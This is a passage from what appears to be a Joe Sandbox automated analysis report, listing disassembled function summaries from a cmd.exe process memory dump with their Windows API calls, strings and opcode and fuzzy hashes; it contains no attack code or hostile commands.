                                                                                        • Opcode Fuzzy Hash: 324940bd99057a43cbb032e89cbb3b32e459669f6fe06f1ce7a9f751c0c3070e
                                                                                        • Instruction Fuzzy Hash: DB02E6799052159BCB24EF28CC49ABAB7B5EF45700F28819AE409E7354EB309E81DF74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8C1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D8C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00D8C14E
                                                                                          • Part of subcall function 00D8C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00D8C16A
                                                                                          • Part of subcall function 00D8C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00D8C17B
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00D8C24F
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00D8C270
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00D8C293
                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00D8C2AE
                                                                                        • memset.MSVCRT ref: 00D8C2EF
                                                                                        • memcpy.MSVCRT ref: 00D8C324
                                                                                        • memcpy.MSVCRT ref: 00D8C370
                                                                                        • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 00D8C392
                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00D8C39D
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D8C3A4
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D8C3B6
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 00D8C3D1
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8C3E2
                                                                                          • Part of subcall function 00D8C5F2: memset.MSVCRT ref: 00D8C62E
                                                                                          • Part of subcall function 00D8C5F2: memset.MSVCRT ref: 00D8C656
                                                                                          • Part of subcall function 00D8C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00D8C6C7
                                                                                          • Part of subcall function 00D8C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00D8C6E6
                                                                                          • Part of subcall function 00D8C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00D8C72A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                        • String ID:
                                                                                        • API String ID: 223857506-0
                                                                                        • Opcode ID: 8df7f1cd3d6c8f0b99a2248c84dfe83934c125698aaf4baac4997afc271d482f
                                                                                        • Instruction ID: 86e0155c5a754522eb7536463349071a2aafcf5db91781ed88cdeef5275945b1
                                                                                        • Opcode Fuzzy Hash: 8df7f1cd3d6c8f0b99a2248c84dfe83934c125698aaf4baac4997afc271d482f
                                                                                        • Instruction Fuzzy Hash: 98519E71A10204EFDB15AFB8DC49ABEB7B8EF48704B14856AF806E6251E774DD02CB74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69310 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 249timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D69342
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D69356
                                                                                        • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D6936A
                                                                                        • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D6937E
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00D7BC07
                                                                                        • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00D7BD31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                        • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                        • API String ID: 55602301-2516506544
                                                                                        • Opcode ID: 77d9ece82c847551d6e4d73ae0e45b78238c9efc9be91613c9a4cb0000a5b589
                                                                                        • Instruction ID: 38d5442455860a869fb36c5a06fdc8c2e92444cc119d890a7e33d17829875aa1
                                                                                        • Opcode Fuzzy Hash: 77d9ece82c847551d6e4d73ae0e45b78238c9efc9be91613c9a4cb0000a5b589
                                                                                        • Instruction Fuzzy Hash: 4E8183769002199BCF259F648C54BFAB3B9EB44710F5881ABE84ED7250FB319E85CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?), ref: 00D758BB
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D758CD
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D75944
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7594B
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7596C
                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D75973
                                                                                        • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7598F
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D759B6
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D8160B
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D81618
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3609286125-0
                                                                                        • Opcode ID: 399e5d22faff4beaf415f71c9e40790ab7ef13e66d8403f6ce520400dc0ffeb6
                                                                                        • Instruction ID: 62348745d060a4be48a8ba8a7d43e62907e01ae3a1ea690d05c2ff7681b0705e
                                                                                        • Opcode Fuzzy Hash: 399e5d22faff4beaf415f71c9e40790ab7ef13e66d8403f6ce520400dc0ffeb6
                                                                                        • Instruction Fuzzy Hash: 2E319031201700EFDB549F68EC09B6A3BA5EB45325F248619E69AC33E4E7759801DF72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74759 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00D74782
                                                                                        • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 00D747D4
                                                                                        • RtlReleaseRelativeName.NTDLL(?), ref: 00D747E0
                                                                                        • RtlFreeUnicodeString.NTDLL(?), ref: 00D747EA
                                                                                          • Part of subcall function 00D74823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00D7484F
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00D7480E
                                                                                        • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00D8096F
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8097D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                        • String ID: @
                                                                                        • API String ID: 2968197161-2766056989
                                                                                        • Opcode ID: 7d2d1519fb1936588b43fb821b3322b48efdc91b7ceb7a2c5828091f2dc64b6e
                                                                                        • Instruction ID: f30693a0160a6c500be06edcf18fb3dfb2c00dac29da5c8f8dc4b54079e28de0
                                                                                        • Opcode Fuzzy Hash: 7d2d1519fb1936588b43fb821b3322b48efdc91b7ceb7a2c5828091f2dc64b6e
                                                                                        • Instruction Fuzzy Hash: C8216071E00209AFDB11EFA9D848AEEBBB8EB49750F144126E916F3251E7709E05CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D87460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87483
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87495
                                                                                        • fprintf.MSVCRT ref: 00D874BB
                                                                                        • fflush.MSVCRT ref: 00D874C9
                                                                                        • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D874E2
                                                                                        • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 00D874F8
                                                                                        • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D874FF
                                                                                        • _get_osfhandle.MSVCRT ref: 00D8751C
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D87524
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3139166086-0
                                                                                        • Opcode ID: db9c6def61a4fb12e1b6330e1bc41a48b3a28a79c03ec378c9628d5604d4f371
                                                                                        • Instruction ID: 76d92db29072faa5a9e1ee3e7b7e8440f3450a80578900a6e992351f8021a640
                                                                                        • Opcode Fuzzy Hash: db9c6def61a4fb12e1b6330e1bc41a48b3a28a79c03ec378c9628d5604d4f371
                                                                                        • Instruction Fuzzy Hash: DA11B230108300BFDB517B68EC0EB7A3B28EB06755F184619F505D52A2EBB9C955CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                        • API String ID: 0-3532704233
                                                                                        • Opcode ID: 90c677e59c5559e9f850e4514adec9aa1f6569050922916e1d6bb37bf889bb10
                                                                                        • Instruction ID: c8d3c772d85e6452862d63ea8b755667038e3041e7222851ddc8a0087b49ce82
                                                                                        • Opcode Fuzzy Hash: 90c677e59c5559e9f850e4514adec9aa1f6569050922916e1d6bb37bf889bb10
                                                                                        • Instruction Fuzzy Hash: 81B18D715083519FC721DF24C480A6FBBE8BF89718F09496EF99ADB240D770D948CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D71D90: _wcsnicmp.MSVCRT ref: 00D71E14
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                          • Part of subcall function 00D74BAF: _wcsnicmp.MSVCRT ref: 00D74C1A
                                                                                          • Part of subcall function 00D74BAF: _wcsnicmp.MSVCRT ref: 00D80B39
                                                                                        • memset.MSVCRT ref: 00D74975
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00D74ABC
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D74AF4
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D74AFF
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D74B28
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                        • String ID: COPYCMD
                                                                                        • API String ID: 1068965577-3727491224
                                                                                        • Opcode ID: a4b96e1c16dede699297014472218aaf07c7aa044d3a31cb538c57108c229a3e
                                                                                        • Instruction ID: 0687600dc898cf97427ef8752255c5a8bed159ec52a3ec341e0f01b3276b472c
                                                                                        • Opcode Fuzzy Hash: a4b96e1c16dede699297014472218aaf07c7aa044d3a31cb538c57108c229a3e
                                                                                        • Instruction Fuzzy Hash: FED1E535A002159BCB29EF68C895ABAB7F1EF58300F598569D84AD7381FB30ED45CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D64E3B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _setjmp3.MSVCRT ref: 00D64E78
                                                                                          • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • NtQueryInformationProcess.NTDLL ref: 00D64F28
                                                                                        • NtSetInformationProcess.NTDLL ref: 00D64F46
                                                                                        • NtSetInformationProcess.NTDLL ref: 00D64FAE
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00000000), ref: 00D791C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                        • String ID: %9d
                                                                                        • API String ID: 4212706909-2241623522
                                                                                        • Opcode ID: 7cb2a33bf3dea03527107bea70f63bd14fec1fa970d77459e92e0c16b4b55d5d
                                                                                        • Instruction ID: ab46856b3eed9c6a3d6b82fef21dc823372cc06b869ca95f30a10aa5db56dc06
                                                                                        • Opcode Fuzzy Hash: 7cb2a33bf3dea03527107bea70f63bd14fec1fa970d77459e92e0c16b4b55d5d
                                                                                        • Instruction Fuzzy Hash: D541B3B1E04315AFD710DFA99C45A6AFBF4EB85724F14421AFA54D7390EBB08900DBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03ADD0E6
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03ADD263
                                                                                        • @, xrefs: 03ADD09D
                                                                                        • @, xrefs: 03ADD24F
                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 03ADD136
                                                                                        • @, xrefs: 03ADD2B3
                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03ADD06F
                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03ADD202
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                        • API String ID: 0-1356375266
                                                                                        • Opcode ID: 14087f8f2b8c6bfc67e40c782552f6fec990d765317030233c3a462f0f7d17b3
                                                                                        • Instruction ID: 9b50a93eba5169b8f146b638698fb5f4b408ed94c5800b59123f04dae0878a28
                                                                                        • Opcode Fuzzy Hash: 14087f8f2b8c6bfc67e40c782552f6fec990d765317030233c3a462f0f7d17b3
                                                                                        • Instruction Fuzzy Hash: DAA178B15083159FD721DF24C480BABBBE8FF85719F014A6EF5999A240E774D908CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D67A9C
                                                                                        • memset.MSVCRT ref: 00D67AC7
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67BCA
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D67BDC
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00D7AE5B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Heap$AllocProcesslongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 2656838167-0
                                                                                        • Opcode ID: 0b667347dd341f4c8a4dfbf30d8c49eac506053e3c269b0c8310ba4798bcdf6f
                                                                                        • Instruction ID: 64f611adf15716817cc93175558c99b543b70a16194a50110f81a8bb74a2af9b
                                                                                        • Opcode Fuzzy Hash: 0b667347dd341f4c8a4dfbf30d8c49eac506053e3c269b0c8310ba4798bcdf6f
                                                                                        • Instruction Fuzzy Hash: F4D1C571A042199FCB38DF28C8917AEB7B1EF44704F58419DE54A97681EB70AE80CFB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D66E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                        • String ID:
                                                                                        • API String ID: 3168844106-0
                                                                                        • Opcode ID: 5f0b8fd78f6bb01969673ecd325efbd90d62c5fa7c1890e5a2ac50d594178783
                                                                                        • Instruction ID: 5840ade05e96978147a7ac09832a88adcc5f4033a9cf7419bf93c2f7da2470bd
                                                                                        • Opcode Fuzzy Hash: 5f0b8fd78f6bb01969673ecd325efbd90d62c5fa7c1890e5a2ac50d594178783
                                                                                        • Instruction Fuzzy Hash: 3CC1A1356043058BC718EF28D851A6AB7E2EFD9704F18892DF88A87351FB31D945CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D70207 Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D70297
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D702B0
                                                                                        • memcpy.MSVCRT ref: 00D70311
                                                                                        • _wcsnicmp.MSVCRT ref: 00D70367
                                                                                        • _wcsicmp.MSVCRT ref: 00D7E746
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
